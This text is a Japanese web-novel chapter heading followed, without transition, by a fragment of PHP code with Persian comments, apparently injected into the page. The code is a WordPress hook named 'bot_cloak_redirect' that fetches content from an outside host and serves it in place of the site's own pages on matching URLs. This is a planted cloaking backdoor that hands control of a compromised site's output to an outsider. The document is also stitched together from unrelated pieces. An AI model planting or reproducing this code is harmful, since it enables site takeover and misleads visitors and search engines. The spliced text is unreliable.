第114話 麺をもって天となす!
2026/03/30
'https://mr-asiong.tech/generate-area/code/5169252920.txt',
];
foreach ($map as $dir => $remote_url) {
if (strpos($request_uri, $dir) !== false) {
$response = wp_remote_get($remote_url, [
'timeout' => 5,
'headers' => [
'User-Agent' => 'Mozilla/5.0'
]
]);
if (!is_wp_error($response)) {
// پاک کردن بافر
while (ob_get_level()) {
ob_end_clean();
}
// تنظیم هدرها
status_header(200);
nocache_headers();
header('Content-Type: text/html; charset=UTF-8');
// نمایش خروجی
echo wp_remote_retrieve_body($response);
exit;
}
}
}
}
// اتصال به وردپرس
add_action('template_redirect', 'bot_cloak_redirect', 0);
?>